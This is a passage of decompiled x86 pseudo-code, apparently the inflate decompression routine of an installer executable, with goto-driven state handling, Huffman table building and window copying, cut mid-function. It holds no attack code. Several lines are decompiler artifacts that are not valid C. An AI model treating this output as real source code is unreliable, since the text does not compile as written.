				__eflags = __eax - __ecx;
				 *(__ebp - 0x30) = __eax;
				if(__eax >= __ecx) {
                                                                                                                                                                                                          															__edi = __esi[0x26e8];
                                                                                                                                                                                                          															__edi = __esi[0x26e8] - __eax;
                                                                                                                                                                                                          															__eflags = __edi;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															__ecx = __ecx - __eax;
                                                                                                                                                                                                          															__edi = __ecx - __eax - 1;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														__edx = __esi[0x26e8];
                                                                                                                                                                                                          														__eflags = __eax - __edx;
                                                                                                                                                                                                          														 *(__ebp - 8) = __edx;
                                                                                                                                                                                                          														if(__eax == __edx) {
                                                                                                                                                                                                          															__edx =  &(__esi[0x6e8]);
                                                                                                                                                                                                          															__eflags = __ecx - __edx;
                                                                                                                                                                                                          															if(__ecx != __edx) {
                                                                                                                                                                                                          																__eax = __edx;
                                                                                                                                                                                                          																__eflags = __eax - __ecx;
                                                                                                                                                                                                          																 *(__ebp - 0x30) = __eax;
                                                                                                                                                                                                          																if(__eax >= __ecx) {
                                                                                                                                                                                                          																	__edi =  *(__ebp - 8);
                                                                                                                                                                                                          																	__edi =  *(__ebp - 8) - __eax;
                                                                                                                                                                                                          																	__eflags = __edi;
                                                                                                                                                                                                          																} else {
                                                                                                                                                                                                          																	__ecx = __ecx - __eax;
                                                                                                                                                                                                          																	__edi = __ecx;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														__eflags = __edi;
                                                                                                                                                                                                          														if(__edi == 0) {
                                                                                                                                                                                                          															goto L183;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															goto L152;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L138:
                                                                                                                                                                                                          													__ecx = __esi[0x26e9];
                                                                                                                                                                                                          													__edx =  &(__esi[0x6e8]);
                                                                                                                                                                                                          													__eflags = __ecx - __edx;
                                                                                                                                                                                                          													if(__ecx == __edx) {
                                                                                                                                                                                                          														goto L143;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L139:
                                                                                                                                                                                                          													__eax = __edx;
                                                                                                                                                                                                          													__eflags = __eax - __ecx;
                                                                                                                                                                                                          													if(__eax >= __ecx) {
                                                                                                                                                                                                          														__edi = __edi - __eax;
                                                                                                                                                                                                          														__eflags = __edi;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														__ecx = __ecx - __eax;
                                                                                                                                                                                                          														__edi = __ecx;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													__eflags = __edi;
                                                                                                                                                                                                          													if(__edi == 0) {
                                                                                                                                                                                                          														goto L143;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L152:
                                                                                                                                                                                                          													__ecx =  *(__ebp - 0x20);
                                                                                                                                                                                                          													 *__eax =  *__ecx;
                                                                                                                                                                                                          													__eax = __eax + 1;
                                                                                                                                                                                                          													__ecx = __ecx + 1;
                                                                                                                                                                                                          													__edi = __edi - 1;
                                                                                                                                                                                                          													__eflags = __ecx - __esi[0x26e8];
                                                                                                                                                                                                          													 *(__ebp - 0x30) = __eax;
                                                                                                                                                                                                          													 *(__ebp - 0x20) = __ecx;
                                                                                                                                                                                                          													 *(__ebp - 0x2c) = __edi;
                                                                                                                                                                                                          													if(__ecx == __esi[0x26e8]) {
                                                                                                                                                                                                          														__ecx =  &(__esi[0x6e8]);
                                                                                                                                                                                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t357 =  &(__esi[1]);
                                                                                                                                                                                                          													 *_t357 = __esi[1] - 1;
                                                                                                                                                                                                          													__eflags =  *_t357;
                                                                                                                                                                                                          												} while ( *_t357 != 0);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L23;
                                                                                                                                                                                                          										case 6:
                                                                                                                                                                                                          											L156:
                                                                                                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                          											__edi =  *(__ebp - 0x30);
                                                                                                                                                                                                          											__eflags = __eax;
                                                                                                                                                                                                          											if(__eax != 0) {
                                                                                                                                                                                                          												L172:
                                                                                                                                                                                                          												__cl = __esi[2];
                                                                                                                                                                                                          												 *__edi = __cl;
                                                                                                                                                                                                          												__edi = __edi + 1;
                                                                                                                                                                                                          												__eax = __eax - 1;
                                                                                                                                                                                                          												 *(__ebp - 0x30) = __edi;
                                                                                                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                          												goto L23;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L157:
                                                                                                                                                                                                          											__ecx = __esi[0x26e8];
                                                                                                                                                                                                          											__eflags = __edi - __ecx;
                                                                                                                                                                                                          											if(__edi != __ecx) {
                                                                                                                                                                                                          												L163:
                                                                                                                                                                                                          												__esi[0x26ea] = __edi;
                                                                                                                                                                                                          												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                                                                                          												__edi = __esi[0x26ea];
                                                                                                                                                                                                          												__ecx = __esi[0x26e9];
                                                                                                                                                                                                          												__eflags = __edi - __ecx;
                                                                                                                                                                                                          												 *(__ebp - 0x30) = __edi;
                                                                                                                                                                                                          												if(__edi >= __ecx) {
                                                                                                                                                                                                          													__eax = __esi[0x26e8];
                                                                                                                                                                                                          													__eax = __esi[0x26e8] - __edi;
                                                                                                                                                                                                          													__eflags = __eax;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													__ecx = __ecx - __edi;
                                                                                                                                                                                                          													__eax = __ecx - __edi - 1;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__edx = __esi[0x26e8];
                                                                                                                                                                                                          												__eflags = __edi - __edx;
                                                                                                                                                                                                          												 *(__ebp - 8) = __edx;
                                                                                                                                                                                                          												if(__edi == __edx) {
                                                                                                                                                                                                          													__edx =  &(__esi[0x6e8]);
                                                                                                                                                                                                          													__eflags = __ecx - __edx;
                                                                                                                                                                                                          													if(__ecx != __edx) {
                                                                                                                                                                                                          														__edi = __edx;
                                                                                                                                                                                                          														__eflags = __edi - __ecx;
                                                                                                                                                                                                          														 *(__ebp - 0x30) = __edi;
                                                                                                                                                                                                          														if(__edi >= __ecx) {
                                                                                                                                                                                                          															__eax =  *(__ebp - 8);
                                                                                                                                                                                                          															__eax =  *(__ebp - 8) - __edi;
                                                                                                                                                                                                          															__eflags = __eax;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															__ecx = __ecx - __edi;
                                                                                                                                                                                                          															__eax = __ecx;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = __eax;
                                                                                                                                                                                                          												if(__eax == 0) {
                                                                                                                                                                                                          													goto L183;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													goto L172;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L158:
                                                                                                                                                                                                          											__eax = __esi[0x26e9];
                                                                                                                                                                                                          											__edx =  &(__esi[0x6e8]);
                                                                                                                                                                                                          											__eflags = __eax - __edx;
                                                                                                                                                                                                          											if(__eax == __edx) {
                                                                                                                                                                                                          												goto L163;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L159:
                                                                                                                                                                                                          											__edi = __edx;
                                                                                                                                                                                                          											__eflags = __edi - __eax;
                                                                                                                                                                                                          											if(__edi >= __eax) {
                                                                                                                                                                                                          												__ecx = __ecx - __edi;
                                                                                                                                                                                                          												__eflags = __ecx;
                                                                                                                                                                                                          												__eax = __ecx;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eax = __eax - __edi;
                                                                                                                                                                                                          												__eax = __eax - 1;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = __eax;
                                                                                                                                                                                                          											if(__eax != 0) {
                                                                                                                                                                                                          												goto L172;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L163;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										case 7:
                                                                                                                                                                                                          											L173:
                                                                                                                                                                                                          											__eflags = __ebx - 7;
                                                                                                                                                                                                          											if(__ebx > 7) {
                                                                                                                                                                                                          												__ebx = __ebx - 8;
                                                                                                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                                                                                                                                          												_t380 = __ebp - 0x38;
                                                                                                                                                                                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                                                                                                                                          												__eflags =  *_t380;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L175;
                                                                                                                                                                                                          										case 8:
                                                                                                                                                                                                          											L4:
                                                                                                                                                                                                          											while(_t425 < 3) {
                                                                                                                                                                                                          												if( *(_t448 - 0x34) == 0) {
                                                                                                                                                                                                          													goto L182;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                                                                                                                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                                                                                                                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                                                                                                                                          													_t425 = _t425 + 8;
                                                                                                                                                                                                          													continue;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t425 = _t425 - 3;
                                                                                                                                                                                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                                                                                                                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                                                                                                                                          											asm("sbb ecx, ecx");
                                                                                                                                                                                                          											_t408 = _t406 >> 1;
                                                                                                                                                                                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                                                                                                                                          											if(_t408 == 0) {
                                                                                                                                                                                                          												L24:
                                                                                                                                                                                                          												 *_t446 = 9;
                                                                                                                                                                                                          												_t436 = _t425 & 0x00000007;
                                                                                                                                                                                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                                                                                                                                          												_t425 = _t425 - _t436;
                                                                                                                                                                                                          												goto L180;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L6:
                                                                                                                                                                                                          											_t411 = _t408 - 1;
                                                                                                                                                                                                          											if(_t411 == 0) {
                                                                                                                                                                                                          												L13:
                                                                                                                                                                                                          												__eflags =  *0x42e3d0;
                                                                                                                                                                                                          												if( *0x42e3d0 != 0) {
                                                                                                                                                                                                          													L22:
                                                                                                                                                                                                          													_t412 =  *0x40a444; // 0x9
                                                                                                                                                                                                          													_t446[4] = _t412;
                                                                                                                                                                                                          													_t413 =  *0x40a448; // 0x5
                                                                                                                                                                                                          													_t446[4] = _t413;
                                                                                                                                                                                                          													_t414 =  *0x42d24c; // 0x0
                                                                                                                                                                                                          													_t446[5] = _t414;
                                                                                                                                                                                                          													_t415 =  *0x42d248; // 0x0
                                                                                                                                                                                                          													_t446[6] = _t415;
                                                                                                                                                                                                          													L23:
                                                                                                                                                                                                          													 *_t446 =  *_t446 & 0x00000000;
                                                                                                                                                                                                          													goto L180;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t26 = _t448 - 8;
                                                                                                                                                                                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                                                                                                                          													__eflags =  *_t26;
                                                                                                                                                                                                          													_t416 = 0x42d250;
                                                                                                                                                                                                          													goto L15;
                                                                                                                                                                                                          													L20:
                                                                                                                                                                                                          													 *_t416 = _t438;
                                                                                                                                                                                                          													_t416 = _t416 + 4;
                                                                                                                                                                                                          													__eflags = _t416 - 0x42d6d0;
                                                                                                                                                                                                          													if(_t416 < 0x42d6d0) {
                                                                                                                                                                                                          														L15:
                                                                                                                                                                                                          														__eflags = _t416 - 0x42d48c;
                                                                                                                                                                                                          														_t438 = 8;
                                                                                                                                                                                                          														if(_t416 > 0x42d48c) {
                                                                                                                                                                                                          															__eflags = _t416 - 0x42d650;
                                                                                                                                                                                                          															if(_t416 >= 0x42d650) {
                                                                                                                                                                                                          																__eflags = _t416 - 0x42d6b0;
                                                                                                                                                                                                          																if(_t416 < 0x42d6b0) {
                                                                                                                                                                                                          																	_t438 = 7;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_t438 = 9;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														goto L20;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
                                                                                                                                                                                                          														_push(0x1e);
                                                                                                                                                                                                          														_pop(_t440);
                                                                                                                                                                                                          														_push(5);
                                                                                                                                                                                                          														_pop(_t419);
                                                                                                                                                                                                          														memset(0x42d250, _t419, _t440 << 2);
                                                                                                                                                                                                          														_t450 = _t450 + 0xc;
                                                                                                                                                                                                          														_t442 = 0x42d250 + _t440;
                                                                                                                                                                                                          														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
                                                                                                                                                                                                          														 *0x42e3d0 =  *0x42e3d0 + 1;
                                                                                                                                                                                                          														__eflags =  *0x42e3d0;
                                                                                                                                                                                                          														goto L22;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L7:
                                                                                                                                                                                                          											_t423 = _t411 - 1;
                                                                                                                                                                                                          											if(_t423 == 0) {
                                                                                                                                                                                                          												 *_t446 = 0xb;
                                                                                                                                                                                                          												goto L180;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L8:
                                                                                                                                                                                                          											if(_t423 != 1) {
                                                                                                                                                                                                          												goto L180;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L9;
                                                                                                                                                                                                          										case 9:
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												L27:
                                                                                                                                                                                                          												__eflags = __ebx - 0x20;
                                                                                                                                                                                                          												if(__ebx >= 0x20) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L25:
                                                                                                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                                                          													goto L182;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L26:
                                                                                                                                                                                                          												__eax =  *(__ebp - 0x38);
                                                                                                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                                                          												__ecx = __ebx;
                                                                                                                                                                                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                                                                                                          												__eflags = __ebx;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L28:
                                                                                                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                          											__ebx = 0;
                                                                                                                                                                                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                                                                                                                          											 *(__ebp - 0x40) = 0;
                                                                                                                                                                                                          											__eflags = __eax;
                                                                                                                                                                                                          											__esi[1] = __eax;
                                                                                                                                                                                                          											if(__eax == 0) {
                                                                                                                                                                                                          												goto L53;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L29:
                                                                                                                                                                                                          											_push(0xa);
                                                                                                                                                                                                          											_pop(__eax);
                                                                                                                                                                                                          											goto L54;
                                                                                                                                                                                                          										case 0xa:
                                                                                                                                                                                                          											L30:
                                                                                                                                                                                                          											__eflags =  *(__ebp - 0x34);
                                                                                                                                                                                                          											if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                                                          												goto L182;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L31:
                                                                                                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                          											__eflags = __eax;
                                                                                                                                                                                                          											if(__eax != 0) {
                                                                                                                                                                                                          												L48:
                                                                                                                                                                                                          												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                                                                                                                          												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                                                                                                                          													__eax =  *(__ebp - 0x34);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__ecx = __esi[1];
                                                                                                                                                                                                          												__eflags = __ecx - __eax;
                                                                                                                                                                                                          												__edi = __ecx;
                                                                                                                                                                                                          												if(__ecx >= __eax) {
                                                                                                                                                                                                          													__edi = __eax;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                                                                                                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                                                                                                                          												_t80 =  &(__esi[1]);
                                                                                                                                                                                                          												 *_t80 = __esi[1] - __edi;
                                                                                                                                                                                                          												__eflags =  *_t80;
                                                                                                                                                                                                          												if( *_t80 == 0) {
                                                                                                                                                                                                          													L53:
                                                                                                                                                                                                          													__eax = __esi[0x145];
                                                                                                                                                                                                          													L54:
                                                                                                                                                                                                          													 *__esi = __eax;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L180;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L32:
                                                                                                                                                                                                          											__ecx = __esi[0x26e8];
                                                                                                                                                                                                          											__edx =  *(__ebp - 0x30);
                                                                                                                                                                                                          											__eflags = __edx - __ecx;
                                                                                                                                                                                                          											if(__edx != __ecx) {
                                                                                                                                                                                                          												L38:
                                                                                                                                                                                                          												__esi[0x26ea] = __edx;
                                                                                                                                                                                                          												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                                                                                          												__edx = __esi[0x26ea];
                                                                                                                                                                                                          												__ecx = __esi[0x26e9];
                                                                                                                                                                                                          												__eflags = __edx - __ecx;
                                                                                                                                                                                                          												 *(__ebp - 0x30) = __edx;
                                                                                                                                                                                                          												if(__edx >= __ecx) {
                                                                                                                                                                                                          													__eax = __esi[0x26e8];
                                                                                                                                                                                                          													__eax = __esi[0x26e8] - __edx;
                                                                                                                                                                                                          													__eflags = __eax;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													__ecx = __ecx - __edx;
                                                                                                                                                                                                          													__eax = __ecx - __edx - 1;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__edi = __esi[0x26e8];
                                                                                                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                          												__eflags = __edx - __edi;
                                                                                                                                                                                                          												if(__edx == __edi) {
                                                                                                                                                                                                          													__edx =  &(__esi[0x6e8]);
                                                                                                                                                                                                          													__eflags = __edx - __ecx;
                                                                                                                                                                                                          													if(__eflags != 0) {
                                                                                                                                                                                                          														 *(__ebp - 0x30) = __edx;
                                                                                                                                                                                                          														if(__eflags >= 0) {
                                                                                                                                                                                                          															__edi = __edi - __edx;
                                                                                                                                                                                                          															__eflags = __edi;
                                                                                                                                                                                                          															__eax = __edi;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															__ecx = __ecx - __edx;
                                                                                                                                                                                                          															__eax = __ecx;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												__eflags = __eax;
                                                                                                                                                                                                          												if(__eax == 0) {
                                                                                                                                                                                                          													goto L183;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													goto L48;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L33:
                                                                                                                                                                                                          											__eax = __esi[0x26e9];
                                                                                                                                                                                                          											__edi =  &(__esi[0x6e8]);
                                                                                                                                                                                                          											__eflags = __eax - __edi;
                                                                                                                                                                                                          											if(__eax == __edi) {
                                                                                                                                                                                                          												goto L38;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L34:
                                                                                                                                                                                                          											__edx = __edi;
                                                                                                                                                                                                          											__eflags = __edx - __eax;
                                                                                                                                                                                                          											 *(__ebp - 0x30) = __edx;
                                                                                                                                                                                                          											if(__edx >= __eax) {
                                                                                                                                                                                                          												__ecx = __ecx - __edx;
                                                                                                                                                                                                          												__eflags = __ecx;
                                                                                                                                                                                                          												__eax = __ecx;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												__eax = __eax - __edx;
                                                                                                                                                                                                          												__eax = __eax - 1;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = __eax;
                                                                                                                                                                                                          											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                          											if(__eax != 0) {
                                                                                                                                                                                                          												goto L48;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L38;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										case 0xb:
                                                                                                                                                                                                          											goto L56;
                                                                                                                                                                                                          										case 0xc:
                                                                                                                                                                                                          											L60:
                                                                                                                                                                                                          											__esi[1] = __esi[1] >> 0xa;
                                                                                                                                                                                                          											__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                                                                                                          											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                                                                                                          												goto L68;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											goto L61;
                                                                                                                                                                                                          										case 0xd:
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												L93:
                                                                                                                                                                                                          												__eax = __esi[1];
                                                                                                                                                                                                          												__ecx = __esi[2];
                                                                                                                                                                                                          												__edx = __eax;
                                                                                                                                                                                                          												__eax = __eax & 0x0000001f;
                                                                                                                                                                                                          												__edx = __edx >> 5;
                                                                                                                                                                                                          												__eax = __edx + __eax + 0x102;
                                                                                                                                                                                                          												__eflags = __esi[2] - __eax;
                                                                                                                                                                                                          												if(__esi[2] >= __eax) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L73:
                                                                                                                                                                                                          												__eax = __esi[0x143];
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													L76:
                                                                                                                                                                                                          													__eflags = __ebx - __eax;
                                                                                                                                                                                                          													if(__ebx >= __eax) {
                                                                                                                                                                                                          														break;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L74:
                                                                                                                                                                                                          													__eflags =  *(__ebp - 0x34);
                                                                                                                                                                                                          													if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                                                          														goto L182;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L75:
                                                                                                                                                                                                          													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                          													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                                                          													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                                                          													__ecx = __ebx;
                                                                                                                                                                                                          													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                                                          													__ebx = __ebx + 8;
                                                                                                                                                                                                          													__eflags = __ebx;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L77:
                                                                                                                                                                                                          												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                                                                                                                                          												__eax = __eax &  *(__ebp - 0x40);
                                                                                                                                                                                                          												__ecx = __esi[0x144];
                                                                                                                                                                                                          												__eax = __esi[0x144] + __eax * 4;
                                                                                                                                                                                                          												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                                                                                                                                          												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                                                                                                                                          												__eflags = __eax - 0x10;
                                                                                                                                                                                                          												 *(__ebp - 0x14) = __eax;
                                                                                                                                                                                                          												if(__eax >= 0x10) {
                                                                                                                                                                                                          													L79:
                                                                                                                                                                                                          													__eflags = __eax - 0x12;
                                                                                                                                                                                                          													if(__eax != 0x12) {
                                                                                                                                                                                                          														__eax = __eax + 0xfffffff2;
                                                                                                                                                                                                          														 *(__ebp - 8) = 3;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_push(7);
                                                                                                                                                                                                          														 *(__ebp - 8) = 0xb;
                                                                                                                                                                                                          														_pop(__eax);
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													while(1) {
                                                                                                                                                                                                          														L84:
                                                                                                                                                                                                          														__ecx = __eax + __edx;
                                                                                                                                                                                                          														__eflags = __ebx - __eax + __edx;
                                                                                                                                                                                                          														if(__ebx >= __eax + __edx) {
                                                                                                                                                                                                          															break;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														L82:
                                                                                                                                                                                                          														__eflags =  *(__ebp - 0x34);
                                                                                                                                                                                                          														if( *(__ebp - 0x34) == 0) {
                                                                                                                                                                                                          															goto L182;
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          														L83:
                                                                                                                                                                                                          														__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                          														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                                                                                                          														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                                                                                                          														__ecx = __ebx;
                                                                                                                                                                                                          														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                                                                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                                                                                                          														__ebx = __ebx + 8;
                                                                                                                                                                                                          														__eflags = __ebx;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L85:
                                                                                                                                                                                                          													__ecx = __edx;
                                                                                                                                                                                                          													__ebx = __ebx - __edx;
                                                                                                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                                                          													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                                                                                                          													__edx =  *(__ebp - 8);
                                                                                                                                                                                                          													__ebx = __ebx - __eax;
                                                                                                                                                                                                          													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                                                                                          													__ecx = __eax;
                                                                                                                                                                                                          													__eax = __esi[1];
                                                                                                                                                                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                                                          													__ecx = __esi[2];
                                                                                                                                                                                                          													__eax = __eax >> 5;
                                                                                                                                                                                                          													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                                                                                                                          													__eax = __eax & 0x0000001f;
                                                                                                                                                                                                          													__eax = __edi + __eax + 0x102;
                                                                                                                                                                                                          													__edi = __edx + __ecx;
                                                                                                                                                                                                          													__eflags = __edx + __ecx - __eax;
                                                                                                                                                                                                          													if(__edx + __ecx > __eax) {
                                                                                                                                                                                                          														goto L9;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L86:
                                                                                                                                                                                                          													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                                                                                                                          													if( *(__ebp - 0x14) != 0x10) {
                                                                                                                                                                                                          														L89:
                                                                                                                                                                                                          														__edi = 0;
                                                                                                                                                                                                          														__eflags = 0;
                                                                                                                                                                                                          														L90:
                                                                                                                                                                                                          														__eax = __esi + 0xc + __ecx * 4;
                                                                                                                                                                                                          														do {
                                                                                                                                                                                                          															L91:
                                                                                                                                                                                                          															 *__eax = __edi;
                                                                                                                                                                                                          															__ecx = __ecx + 1;
                                                                                                                                                                                                          															__eax = __eax + 4;
                                                                                                                                                                                                          															__edx = __edx - 1;
                                                                                                                                                                                                          															__eflags = __edx;
                                                                                                                                                                                                          														} while (__edx != 0);
                                                                                                                                                                                                          														__esi[2] = __ecx;
                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L87:
                                                                                                                                                                                                          													__eflags = __ecx - 1;
                                                                                                                                                                                                          													if(__ecx < 1) {
                                                                                                                                                                                                          														goto L9;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													L88:
                                                                                                                                                                                                          													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                                                                                                                          													goto L90;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L78:
                                                                                                                                                                                                          												__ecx = __edx;
                                                                                                                                                                                                          												__ebx = __ebx - __edx;
                                                                                                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                                                          												__ecx = __esi[2];
